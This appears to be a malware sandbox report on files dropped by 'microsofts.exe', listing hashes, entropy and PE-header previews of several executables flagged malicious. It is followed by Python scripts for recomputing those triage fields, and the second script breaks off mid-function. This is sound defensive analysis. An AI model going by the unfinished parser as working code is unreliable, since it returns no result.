SHA-512:153809C63C49B5500C2CE5A5B0A70BF5404CC04BCFE9AF23F70AB66BB06AB0B355AFEC6EDCB486DFC63554932CD2399705AB720F290EA279E83DCD04B8868F2B
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@..................................$..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1143296
Entropy (8bit):5.022678247300027
Encrypted:false
SSDEEP:12288:+Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+sqjnhMgeiCl7G0nehbGZpbD
MD5:70513EC31B42A1D10E4F7C4FF6D753A7
SHA1:346C42CDAF11D74EA4CD9B3641DD0F38D5C61390
SHA-256:058B7BF8C9D71CB2F4BF0F3D1FFA60F66A9793EED1B2285536633122A976FD1E
SHA-512:535D280EEDC9E3402011AC38C106DF10FA46BF4FDE38D17F69A7656D392AFAFC89F92F8CA436F3AEEA88356902535A78EA9953099840C9ACAA400ABC84E22C44
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................w .... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1161728
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.047151054576868
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:okXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:psqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:218E297C0B9167531FDA0494169BD2D7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5510727E7CD6D45164472E011C54204E8A96BE14
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F8B769BED51313A9108DAE26ECF7AFAE67B590C4DCB4C5BC3FB43983E938853C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5CB268ED7E6DC74C266FC7EABA6E8AF00E4AB38D5332637D14E4FCD74BB4D991426F6268DB2E8C3DED59FA355996EBF28E8C4CAC1C89384DE5DB02DB8822C71B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.499777357959095
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:atuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755JDmg27RN:ajEIa4HIEWOc5TD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:98C0971293E8E841115F5417E629C79F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:30D7130EFBC27C25DD6A107ED64BAFA61733BC28
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E23F0DCFD327DD6908100670A1A0FE0BC8B1066EDCCC175A86DC4A083A1B4ECF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A29927BB966D2713FAAF627248C692934DFC1F3ADD32CBBEF18B2CA2C87F2163D3940C7CA1A517E7EC0390C8267A241CFA140FEC3EB8244728EC8F32221F3D27
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....^.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999367317590146
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1572864:qQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:hXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:65311AAE5F505ED11F08A270A2E57AE8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5950E17DF6A5B51F8D9D8E47E2B2004600EEF259
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8A757A59A2BEAC7D82F0B3854D95C29E40E95AA33485FE0583FD3589B91DDE12
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0DBD09BFD4907A851BB114ADFEFB6DDF3DDB04917E92F6918C126BCC908C105DA4B9587259DFE4552B40079CBA954B7303887FADCDAE98857399C4383E339C1E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0........... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1230336
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.185595689762236
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:lejVWYUAkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:QjkY7ksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4177A2185647BDEC804E6A21FE58ACE1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:106621D76B97A27CD1D9FEB9D9ED0BDF98C6ECB0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:34DF89FA363D777FEA2355EB767686C9B263FB0BDB045AE193EF5673F888B3C9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BC1D528E9A7C9EC57EE89325F6455DDC921DE1254AFAF6EA1F92E820F474A515749F7CE67DD0F9C719DE2751E06D846FBCB002284C9CAFB0304F63E23C8D9E6E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..........................................................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................
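The per-file fields in these dropped-file entries (File Type, Size, Entropy, Encrypted, the four hashes and the printable Preview) can be recomputed locally when re-triaging the same samples or comparing them against a quarantine copy. The script below is an added example written for this page, not Joe Sandbox's own code. It derives File Type from the PE headers the Preview column shows in the raw (a Machine value of 0x8664 appears there as "PE..d..." and 0x014C as "PE..L..."), and it assumes an entropy threshold of 7.9 bits per byte for the Encrypted flag, because the report does not publish the threshold it uses; the input PE header is constructed in the block, not taken from the samples.

```python
import hashlib
import math
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C   # shows as "PE..L..." in the report's Preview
IMAGE_FILE_MACHINE_AMD64 = 0x8664  # shows as "PE..d..." in the report's Preview
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
MACHINES = {IMAGE_FILE_MACHINE_I386: "Intel 80386", IMAGE_FILE_MACHINE_AMD64: "x86-64"}
SUBSYSTEMS = {2: "GUI", 3: "console"}

# Assumption: the report does not state how it sets "Encrypted"; 7.9 bits/byte is a
# common packed/encrypted heuristic and is used here as a stand-in.
ENCRYPTED_ENTROPY_THRESHOLD = 7.9


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte; 0.0 for empty or single-valued input."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def preview(data: bytes, length: int = 64) -> str:
    """Printable rendering of the first bytes, non-printables replaced by '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:length])


def pe_file_type(data: bytes) -> str:
    """Classify a buffer the way the report's 'File Type' field does, or 'data'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "data"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "data"
    machine, _, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    # Subsystem sits at offset 68 of the optional header in both PE32 and PE32+.
    if opt_size < 70 or opt + 70 > len(data):
        return "PE executable (truncated optional header), for MS Windows"
    magic = struct.unpack_from("<H", data, opt)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    fmt = {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic, "PE(magic=0x%x)" % magic)
    arch = MACHINES.get(machine, "machine 0x%04x" % machine)
    subsys = SUBSYSTEMS.get(subsystem, "subsystem %d" % subsystem)
    return "%s executable (%s) %s, for MS Windows" % (fmt, subsys, arch)


def triage(data: bytes) -> dict:
    """Reproduce the per-file fields of a dropped-file entry for one buffer."""
    entropy = shannon_entropy(data)
    return {
        "File Type": pe_file_type(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy,
        "Encrypted": entropy > ENCRYPTED_ENTROPY_THRESHOLD,
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
        "Preview": preview(data),
    }


def build_pe(machine: int, magic: int, subsystem: int = 2, payload: bytes = b"") -> bytes:
    """Constructed minimal PE header for testing; it is not a loadable executable."""
    opt_size = 240 if magic == PE32PLUS_MAGIC else 224
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x0002)
    optional = struct.pack("<H", magic) + b"\0" * 66 + struct.pack("<H", subsystem)
    optional += b"\0" * (opt_size - len(optional))
    return dos + coff + optional + payload


if __name__ == "__main__":
    # Constructed inputs: a PE32+ x86-64 header and a PE32 i386 header, as in the entries above.
    for sample in (build_pe(IMAGE_FILE_MACHINE_AMD64, PE32PLUS_MAGIC),
                   build_pe(IMAGE_FILE_MACHINE_I386, PE32_MAGIC)):
        for field, value in triage(sample).items():
            print("%s:%s" % (field, value))
        print()
```

To run it against a real dropped file, read the file with `open(path, "rb").read()` and pass the bytes to `triage`; the hashes should match the entry for that file, and the Preview should reproduce the "PE..d..." or "PE..L..." marker visible above. Entropy near 8.0 with Encrypted true, as for the 59941376-byte sample, indicates a packed or encrypted body and is the usual cue to unpack before static analysis.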
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1384960
Entropy (8bit): 5.377812708800284
Encrypted: false
SSDEEP: 24576:NxwSJhkrmZsQsqjnhMgeiCl7G0nehbGZpbD:Ny+krKsMDmg27RnWGj
MD5: 153105F1CC9F648CCF71BB895355661A
SHA1: A2379A6DD7910C79870B6071203D5F74D31C5C4B
SHA-256: E3BAC8AAECAA94E819DBEFDEF3B89C0FBFE656DE6059183514508978F957AFB9
SHA-512: FE01A8A022B05423D2B36E6DCA48407B3D91737948902059ECE5B3B31B9707B115641BE80B3BD83D8B689D3E4EE96A5F9B92F266B0A2E88914B32D89B496810B
Malicious: true
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1649152
Entropy (8bit): 5.632720792529404
Encrypted: false
SSDEEP: 24576:eHQJLIRgvsnNJsqjnhMgeiCl7G0nehbGZpbD:eHQJL34NDmg27RnWGj
MD5: 20184CFA203DC6AA54CF0140D73EE864
SHA1: 67340FB962BD00C1F4512F0022660101995C1F44
SHA-256: A3A02DDC1C50DC98D1FEB0D670EAA3938817AFD0C1E3F2775F3C8954A8B2F570
SHA-512: 7720F89519A2E7BF638DBE83E60E3DD12F75833672084BA6C6EA7F58FA49215D9E2B0DB56C41704EE6A8EF95F6C1698AD233A1679310FBCC99D10F7FF8954D74
Malicious: true
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5365760
Entropy (8bit): 6.450963168648752
Encrypted: false
SSDEEP: 49152:nUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kY:UWmXL6DEC7dRpKuDQbgWD527BWG
MD5: 7D5AB639B46CCD5B9E040E2AABF23F82
SHA1: 5C5CCA6B3D02597CA84732AA1C63F691300181D4
SHA-256: 689922877BCB34F7F83C1CC9EE2C91BDD837AF0238DAF3BEED7F5E04A5C4120E
SHA-512: 9E7F4594BCF78D4001F2AF6EADC771D4554470D3ADE32B0540FAAE6B0FD3E2676298D550041330091904A5D1EB50324448FBB924CD80C5D4B57A50198E65745D
Malicious: true
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3163136
Entropy (8bit): 7.972781460762583
Encrypted: false
SSDEEP: 98304:orZ23AbsK6Ro022JjL2WEiVqJZpD527BWG:CJADmmxL2WEoCZpVQBWG
MD5: 699F9CEEB82321DABE2146018B22F487
SHA1: D257010C5C19955B0B1AFF4E09A2C929B6846AFC
SHA-256: 0148E4F4FAF10951841DF56A1896794FB1FDCD6DFFAB5CF5657096C3ACE73036
SHA-512: 93868754EA08CDD2A8D147BD6D3A1E6C7A3D7E460D99F9481BAEBC1D7BAF8A92D158A5C379B58B2B1E8EC5F32AACA0E5967CD84DD7E4B9F28E17D5536AE828A6
Malicious: true
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1213440
Entropy (8bit): 7.204906337872632
Encrypted: false
SSDEEP: 24576:ofrYY42wd7hlOw9fpkEE64AsqjnhMgeiCl7G0nehbGZpbD:lz9xrS8Dmg27RnWGj
MD5: 3362AFD5CF849427D2BC0955FF367C35
SHA1: D27075CA31EEAD97EC315FB8AFA06621ABBBED88
SHA-256: 802D0FCB5E78E4CCBD1A5A803361ECCC6AC8855FFC2027D9507766481FBFA544
SHA-512: 0D300766FCADAD875A3DEA37BB4D29EE61FAB72E8C41D5F0283493F7998A7C4241EC8C61CC06A75095965FA30808E01D04D34B1090E35C89D8C5FD2C7D11A3F8
Malicious: true
Reputation: unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ........... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1388544
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2729399535312
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:nwkNKiZ+R2GGNUbTF5vXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:nzNKUE5vsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0679F7DD20FB5D718C60587AA50F928D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D0BDADEDE7B4B9D0DE3339A0AF07C83794458E2D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A67B5DE119892A6F1D8F8AF3824AFBA64B8B196974DE8C9F07D0786ADCB61AD8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3AA70BD7FC280057C51FD12ACD3A3C9861CE53F9CDD3C7177DC06CD93B1C224CC5509A40A58224DE6880E1A6DF990416F9077A901DB4B41FB530CFF331611561
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P............ .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.5743300973711785
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:KALuzDKnxCp3JKNrPJzruaI6HMaJTtGbCD527BWG:9aGg3cFPIaI6HMaJTtGbCVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E82F15488BCFDEC21C8E27E522CD72DA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0D0F8580EEA4CD0F19BE2CB35854162A154DD04E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DB54BD5B8CDAC1BED5D3F63F6E43AC1FFF4CD394684888126C4E1A21C491D09E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E0DD8FA96619AF6DA6B087D9D5D0FD966EDC7E1DB14D38EF808C2EFD44396932E8F2DB3946490587489CC3D2ACCEE7310D8E7D85CBDAF4EFC40625BEE53E90E2
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.....b.Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.356065620091348
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:PXr/SVMxWssqjnhMgeiCl7G0nehbGZpbD:z1xpDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BF7151F657F9384347E9D41DCA8E031A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3B9E6407C22BB03A27D6918C8CA6C37992636FE8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CBB8BF067B073E75C63536B55689EF966C7DEECFB17B418A4212AB089147EE2E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7CE6067EB1CB715CA517D870A830B54893760C9CAA4DA2964A16855DD29712D52D94EF92EADAC9DA0A348877CFD09B81657ED006396B4CCB62761841DD26F45C
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P.................. ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2486359434151515
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:196608:KhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOmVQBWG:KhRCpGpMJMrbp8JjpNdNlc56B
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E43B99D8CB413960A14F026A03520911
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1509964FAB609272321AFB211E18128347395CC4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5E1844078273E91ECE642140C69F20AA34AB9546FA3C7E13906E6A591972798F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DCDD004DEDD005F4223ABACCEF52157B225866FE74F2ED3E5A50D8F7A265D771B6B3D0D7790012D1555E5E2EE6492DC2B75DB20A1B6B4435B086508FEC03D779
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@....................................Y..... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................
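The File Type, Size (bytes), Entropy (8bit), hash and Preview fields in the dropped-file records above are what an analyst recomputes when a dropped file is pulled out of the sandbox for a second look. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses the DOS and PE headers to derive the same libmagic-style "PE32 executable (GUI) Intel 80386" / "PE32+ executable (GUI) x86-64" label (the "PE..L" and "PE..d" bytes visible in the previews are the little-endian machine values 0x014C and 0x8664 right after the "PE\0\0" signature), computes 8-bit Shannon entropy, produces the report's dot-for-non-printable preview, and prints the four hashes in the report's upper-case form. The build_minimal_pe fixture and the 7.2 packed-file entropy threshold are this example's own assumptions; the report states neither.

```python
"""Recompute the per-file triage fields a sandbox report lists for a dropped PE.

Added example; not code from the Joe Sandbox report or the analysed sample.
Assumed: PACKED_ENTROPY_THRESHOLD (heuristic) and the build_minimal_pe fixture.
"""
import hashlib
import math
import struct
from collections import Counter

IMAGE_FILE_MACHINE_I386 = 0x014C   # renders as "PE..L" in a text preview
IMAGE_FILE_MACHINE_AMD64 = 0x8664  # renders as "PE..d"
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
IMAGE_FILE_DLL = 0x2000
PACKED_ENTROPY_THRESHOLD = 7.2     # assumed heuristic: packed/encrypted images sit near 8.0


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a single byte value, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """Upper-case hex digests in the four algorithms the report lists."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def preview(data: bytes, length: int = 64) -> str:
    """Report-style preview: printable ASCII kept, every other byte shown as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:length])


def pe_file_type(data: bytes) -> str:
    """Derive the libmagic-style 'PE32[+] executable (GUI) <arch>, for MS Windows' label."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "not a PE file: missing MZ header"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "not a PE file: missing PE signature"
    # COFF header: Machine at +4, Characteristics at +22; optional header starts at +24.
    machine, characteristics = struct.unpack_from("<H16xH", data, e_lfanew + 4)
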